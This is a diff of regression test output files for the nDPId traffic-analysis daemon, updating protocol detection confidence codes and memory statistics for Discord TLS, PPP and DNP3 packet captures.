@@ -3,10 +3,10 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="} 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="} 
-00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} -00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} +00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} +00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} 00545{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":3306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":42247} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874598 bytes -~~ total memory freed........: 5874598 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6008232 bytes +~~ total memory freed........: 6008232 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 448 chars ~~ json string max len.......: 1299 chars diff --git a/test/results/dlt_ppp.pcap.out b/test/results/dlt_ppp.pcap.out index ac66da9ea..25c283f89 100644 --- a/test/results/dlt_ppp.pcap.out +++ b/test/results/dlt_ppp.pcap.out 
@@ -10,9 +10,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 175 chars ~~ json string max len.......: 1932 chars diff --git a/test/results/dnp3.pcap.out b/test/results/dnp3.pcap.out index 159cec3cf..24b21370a 100644 --- a/test/results/dnp3.pcap.out +++ b/test/results/dnp3.pcap.out 
@@ -4,57 +4,57 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":40,"packets-processed":39,"total-skipped-flows":0,"total-l4-payload-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1097502623045} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":79,"packets-processed":78,"total-skipped-flows":0,"total-l4-payload-len":540,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1097504102255} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-payload-len":3957,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1097505644006} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
